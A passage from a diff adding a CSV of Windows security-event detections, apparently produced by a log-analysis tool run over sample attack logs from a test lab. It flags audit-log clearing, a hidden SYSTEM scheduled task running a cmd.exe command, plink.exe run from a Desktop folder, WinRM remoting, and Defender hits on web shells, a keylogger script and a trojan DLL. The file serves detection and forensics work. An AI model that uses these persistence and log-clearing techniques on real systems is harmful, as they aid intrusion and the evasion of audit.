;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14674
+
+",DC1.insecurebank.local,Security
+Audit log cleared,1552907189.911579,2019-03-18T15:06:29.911579+04:00,,Audit,Critical,schedule task created by user,4698,"
+
+
+
+
+ 4698
+ 0
+ 0
+ 12804
+ 0
+ 0x8020000000000000
+
+
+ 566836
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-500
+ Administrator
+ EXAMPLE
+ 0x17e2d2
+ \CYAlyNSS
+ <?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+ <Triggers>
+ <CalendarTrigger>
+ <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
+ <Enabled>true</Enabled>
+ <ScheduleByDay>
+ <DaysInterval>1</DaysInterval>
+ </ScheduleByDay>
+ </CalendarTrigger>
+ </Triggers>
+ <Principals>
+ <Principal id="LocalSystem">
+ <UserId>S-1-5-18</UserId>
+ <RunLevel>HighestAvailable</RunLevel>
+ <LogonType>InteractiveToken</LogonType>
+ </Principal>
+ </Principals>
+ <Settings>
+ <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
+ <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
+ <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
+ <AllowHardTerminate>true</AllowHardTerminate>
+ <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
+ <IdleSettings>
+ <StopOnIdleEnd>true</StopOnIdleEnd>
+ <RestartOnIdle>false</RestartOnIdle>
+ </IdleSettings>
+ <AllowStartOnDemand>true</AllowStartOnDemand>
+ <Enabled>true</Enabled>
+ <Hidden>true</Hidden>
+ <RunOnlyIfIdle>false</RunOnlyIfIdle>
+ <WakeToRun>false</WakeToRun>
+ <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
+ <Priority>7</Priority>
+ </Settings>
+ <Actions Context="LocalSystem">
+ <Exec>
+ <Command>cmd.exe</Command>
+ <Arguments>/C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1</Arguments>
+ </Exec>
+ </Actions>
+</Task>
+
+",PC01.example.corp,Security
+schedule task created,1552953724.335561,2019-03-19T04:02:04.335561+04:00,,Audit,High,Audit log cleared by user ( user01 ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 432901
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-1106
+ user01
+ EXAMPLE
+ 0x18a7875
+
+
+",WIN-77LTAPHIQ1R.example.corp,Security
+network share object was added,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,network share object was added,5142,"
+
+
+
+
+ 5142
+ 0
+ 0
+ 12808
+ 0
+ 0x8020000000000000
+
+
+ 6273
+
+
+
+
+ Security
+ PC04.example.corp
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ PC04
+ 0x128a9
+ \\*\PRINT
+ c:\windows\system32
+
+",PC04.example.corp,Security
+Audit log cleared,1552953724.179623,2019-03-19T04:02:04.179623+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 566821
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-500
+ administrator
+ EXAMPLE
+ 0x4fd77
+
+
+",WIN-77LTAPHIQ1R.example.corp,Security
+Audit log cleared,1552851030.324836,2019-03-17T23:30:30.324836+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 6272
+
+
+
+
+ Security
+ PC04.example.corp
+
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ PC04
+ 0x128a9
+
+
+",PC04.example.corp,Security
+Audit log cleared,1552951423.570212,2019-03-19T03:23:43.570212+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 565591
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-500
+ administrator
+ EXAMPLE
+ 0x4fd77
+
+
+",WIN-77LTAPHIQ1R.example.corp,Security
+Audit log cleared,1547969410.645116,2019-01-20T11:30:10.645116+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 32950
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-500
+ Administrator
+ EXAMPLE
+ 0x35312
+
+
+",WIN-77LTAPHIQ1R.example.corp,Security
+Audit log cleared,1547967656.784849,2019-01-20T11:00:56.784849+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 32853
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-500
+ Administrator
+ EXAMPLE
+ 0x35312
+
+
+",WIN-77LTAPHIQ1R.example.corp,Security
+Audit log cleared,1600193079.987052,2020-09-15T22:04:39.987052+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 161471
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x52a7d
+
+
+",MSEDGEWIN10,Security
+Audit log cleared,1552908425.42562,2019-03-18T15:27:05.425620+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 433307
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-1106
+ user01
+ EXAMPLE
+ 0x18a7875
+
+
+",PC01.example.corp,Security
+Suspicious Command or process found in the log,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,Critical,Found a log contain suspicious command or process ( plink.exe),4688,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227714
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-1106
+ user01
+ EXAMPLE
+ 0x2ed80
+ 0xcfc
+ C:\Users\user01\Desktop\plink.exe
+ %%1936
+ 0xe60
+
+
+",PC01.example.corp,Security
+Process running in Unusual location,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,High,"User Name : ( user01 ) with process : ( C:\Users\user01\Desktop\plink.exe ) run from Unusual location , check the number and date of execution in process execution report",4688,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227714
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-1106
+ user01
+ EXAMPLE
+ 0x2ed80
+ 0xcfc
+ C:\Users\user01\Desktop\plink.exe
+ %%1936
+ 0xe60
+
+
+",PC01.example.corp,Security
+Audit log cleared,1550080907.51234,2019-02-13T22:01:47.512340+04:00,,Audit,Critical,Audit log cleared by user ( admin01 ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 227693
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-1108
+ admin01
+ EXAMPLE
+ 0xaf855
+
+
+",PC01.example.corp,Security
+connection is initiated using WinRM to this machine - Powershell remoting,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User (S-1-5-21-738609754-2819869699-4189121830-500) Connected to this machine using WinRM - powershell remote - check eventlog viewer,91,"
+
+
+
+
+ 91
+ 0
+ 4
+ 9
+ 0
+ 0x4000000000000004
+
+
+ 508
+
+
+
+
+ Microsoft-Windows-WinRM/Operational
+ DC1.insecurebank.local
+
+
+
+
+ 15005
+ shellId
+ 68007400740070003A002F002F0073006300680065006D00610073002E006D006900630072006F0073006F00660074002E0063006F006D002F007700620065006D002F00770073006D0061006E002F0031002F00770069006E0064006F00770073002F007300680065006C006C002F0063006D0064000000
+
+",DC1.insecurebank.local,Microsoft-Windows-WinRM/Operational
+Windows Defender took action against Malware,1563483223.034598,2019-07-19T00:53:43.034598+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Action ( 6 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"
+
+
+
+
+ 1117
+ 0
+ 4
+ 0
+ 0
+ 0x8000000000000000
+
+
+ 106
+
+
+
+
+ Microsoft-Windows-Windows Defender/Operational
+ MSEDGEWIN10
+
+
+
+
+ %%827
+ 4.18.1906.3
+ {8791B1FB-0FE7-412E-B084-524CB5A221F3}
+ 2019-07-18T20:40:13.775Z
+
+
+ 2147735426
+ Trojan:XML/Exeselrun.gen!A
+ 5
+ Severe
+ 8
+ Trojan
+ https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0
+ 5
+
+ 2
+ 3
+ %%818
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+
+ file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl
+ 1
+ %%845
+ 1
+ %%813
+ 2
+ %%823
+ 0
+ 6
+ %%811
+
+ 0x80508023
+ The program could not find the malware and other potentially unwanted software on this device.
+
+ 0
+ 0
+ No additional actions required
+ NT AUTHORITY\SYSTEM
+
+ AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
+ AM: 1.1.16100.4, NIS: 0.0.0.0
+
+",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender took action against Malware,1563483211.952568,2019-07-19T00:53:31.952568+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Action ( 2 ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"
+
+
+
+
+ 1117
+ 0
+ 4
+ 0
+ 0
+ 0x8000000000000000
+
+
+ 105
+
+
+
+
+ Microsoft-Windows-Windows Defender/Operational
+ MSEDGEWIN10
+
+
+
+
+ %%827
+ 4.18.1906.3
+ {37522D93-EBDD-4A5B-93B6-E984C9E3FD38}
+ 2019-07-18T20:40:16.697Z
+
+
+ 2147708292
+ HackTool:JS/Jsprat
+ 4
+ High
+ 34
+ Tool
+ https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0
+ 3
+
+ 2
+ 3
+ %%818
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+
+ containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068)
+ 1
+ %%845
+ 1
+ %%813
+ 8
+ %%862
+ 0
+ 2
+ %%809
+
+ 0x00000000
+ The operation completed successfully.
+
+ 0
+ 0
+ No additional actions required
+ NT AUTHORITY\SYSTEM
+
+ AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
+ AM: 1.1.16100.4, NIS: 0.0.0.0
+
+",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender took action against Malware,1563483211.905406,2019-07-19T00:53:31.905406+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"
+
+
+
+
+ 1117
+ 0
+ 4
+ 0
+ 0
+ 0x8000000000000000
+
+
+ 104
+
+
+
+
+ Microsoft-Windows-Windows Defender/Operational
+ MSEDGEWIN10
+
+
+
+
+ %%827
+ 4.18.1906.3
+ {F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}
+ 2019-07-18T20:41:40.357Z
+
+
+ 2147726426
+ Trojan:Win32/Sehyioa.A!cl
+ 5
+ Severe
+ 8
+ Trojan
+ https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0
+ 3
+
+ 2
+ 3
+ %%818
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+
+ file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll
+ 1
+ %%845
+ 1
+ %%813
+ 8
+ %%862
+ 0
+ 2
+ %%809
+
+ 0x00000000
+ The operation completed successfully.
+
+ 0
+ 0
+ No additional actions required
+ NT AUTHORITY\SYSTEM
+
+ AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
+ AM: 1.1.16100.4, NIS: 0.0.0.0
+
+",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender took action against Malware,1563483211.90261,2019-07-19T00:53:31.902610+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Action ( 2 ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"
+
+
+
+
+ 1117
+ 0
+ 4
+ 0
+ 0
+ 0x8000000000000000
+
+
+ 103
+
+
+
+
+ Microsoft-Windows-Windows Defender/Operational
+ MSEDGEWIN10
+
+
+
+
+ %%827
+ 4.18.1906.3
+ {CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}
+ 2019-07-18T20:40:18.385Z
+
+
+ 2147683177
+ Backdoor:ASP/Ace.T
+ 5
+ Severe
+ 6
+ Backdoor
+ https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0
+ 3
+
+ 2
+ 3
+ %%818
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+
+ file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx
+ 1
+ %%845
+ 1
+ %%813
+ 0
+ %%822
+ 0
+ 2
+ %%809
+
+ 0x00000000
+ The operation completed successfully.
+
+ 0
+ 0
+ No additional actions required
+ NT AUTHORITY\SYSTEM
+
+ AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
+ AM: 1.1.16100.4, NIS: 0.0.0.0
+
+",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender Found Malware,1563483211.900809,2019-07-19T00:53:31.900809+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"
+
+
+
+
+ 1116
+ 0
+ 3
+ 0
+ 0
+ 0x8000000000000000
+
+
+ 102
+
+
+
+
+ Microsoft-Windows-Windows Defender/Operational
+ MSEDGEWIN10
+
+
+
+
+ %%827
+ 4.18.1906.3
+ {37522D93-EBDD-4A5B-93B6-E984C9E3FD38}
+ 2019-07-18T20:40:16.697Z
+
+
+ 2147708292
+ HackTool:JS/Jsprat
+ 4
+ High
+ 34
+ Tool
+ https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0
+ 1
+
+ 1
+ 3
+ %%818
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+
+ containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068)
+ 1
+ %%845
+ 1
+ %%813
+ 8
+ %%862
+ 0
+ 9
+ %%887
+
+ 0x00000000
+ The operation completed successfully.
+
+ 0
+ 0
+ No additional actions required
+
+
+ AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
+ AM: 1.1.16100.4, NIS: 0.0.0.0
+
+",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Suspicious Command or process found in the log,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1117,"
+
+
+
+
+ 1117
+ 0
+ 4
+ 0
+ 0
+ 0x8000000000000000
+
+
+ 101
+
+
+
+
+ Microsoft-Windows-Windows Defender/Operational
+ MSEDGEWIN10
+
+
+
+
+ %%827
+ 4.18.1906.3
+ {511224D4-1EB4-47B9-BC4A-37E21F923FED}
+ 2019-07-18T20:40:00.580Z
+
+
+ 2147725349
+ Trojan:PowerShell/Powersploit.M
+ 5
+ Severe
+ 8
+ Trojan
+ https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0
+ 103
+
+ 2
+ 3
+ %%818
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+
+ file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1
+ 1
+ %%845
+ 1
+ %%813
+ 0
+ %%822
+ 0
+ 2
+ %%809
+
+ 0x80508023
+ The program could not find the malware and other potentially unwanted software on this device.
+
+ 0
+ 0
+ No additional actions required
+ NT AUTHORITY\SYSTEM
+
+ AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
+ AM: 1.1.16100.4, NIS: 0.0.0.0
+
+",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender took action against Malware,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"
+
+
+
+
+ 1117
+ 0
+ 4
+ 0
+ 0
+ 0x8000000000000000
+
+
+ 101
+
+
+
+
+ Microsoft-Windows-Windows Defender/Operational
+ MSEDGEWIN10
+
+
+
+
+ %%827
+ 4.18.1906.3
+ {511224D4-1EB4-47B9-BC4A-37E21F923FED}
+ 2019-07-18T20:40:00.580Z
+
+
+ 2147725349
+ Trojan:PowerShell/Powersploit.M
+ 5
+ Severe
+ 8
+ Trojan
+ https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0
+ 103
+
+ 2
+ 3
+ %%818
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+
+ file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1
+ 1
+ %%845
+ 1
+ %%813
+ 0
+ %%822
+ 0
+ 2
+ %%809
+
+ 0x80508023
+ The program could not find the malware and other potentially unwanted software on this device.
+
+ 0
+ 0
+ No additional actions required
+ NT AUTHORITY\SYSTEM
+
+ AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
+ AM: 1.1.16100.4, NIS: 0.0.0.0
+
+",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender Found Malware,1563482515.198914,2019-07-19T00:41:55.198914+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"
+
+
+
+
+ 1116
+ 0
+ 3
+ 0
+ 0
+ 0x8000000000000000
+
+
+ 95
+
+
+
+
+ Microsoft-Windows-Windows Defender/Operational
+ MSEDGEWIN10
+
+
+
+
+ %%827
+ 4.18.1906.3
+ {F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}
+ 2019-07-18T20:41:40.357Z
+
+
+ 2147726426
+ Trojan:Win32/Sehyioa.A!cl
+ 5
+ Severe
+ 8
+ Trojan
+ https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0
+ 1
+
+ 1
+ 3
+ %%818
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+
+ file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll
+ 1
+ %%845
+ 1
+ %%813
+ 8
+ %%862
+ 0
+ 9
+ %%887
+
+ 0x00000000
+ The operation completed successfully.
+
+ 0
+ 0
+ No additional actions required
+
+
+ AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0
+ AM: 1.1.16100.4, NIS: 0.0.0.0
+
+",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender Found Malware,1563482477.632054,2019-07-19T00:41:17.632054+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"
+
+
+
+
+ 1116
+ 0
+ 3
+ 0
+ 0
+ 0x8000000000000000
+
+
+ 76
+
+
+
+
+ Microsoft-Windows-Windows Defender/Operational
+ MSEDGEWIN10
+
+
+
+
+ %%827
+ 4.18.1906.3
+ {CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}
+ 2019-07-18T20:40:18.385Z
+
+
+ 2147683177
+ Backdoor:ASP/Ace.T
+ 5
+ Severe
+ 6
+ Backdoor
+ https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0
+ 1
+
+ 1
+ 3
+ %%818
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+
+ file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx
+ 1
+ %%845
+ 1
+ %%813
+ 0
+ %%822
+ 0
+ 9
+ %%887
+
+ 0x00000000
+ The operation completed successfully.
+
+ 0
+ 0
+ No additional actions required
+
+
+ AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0
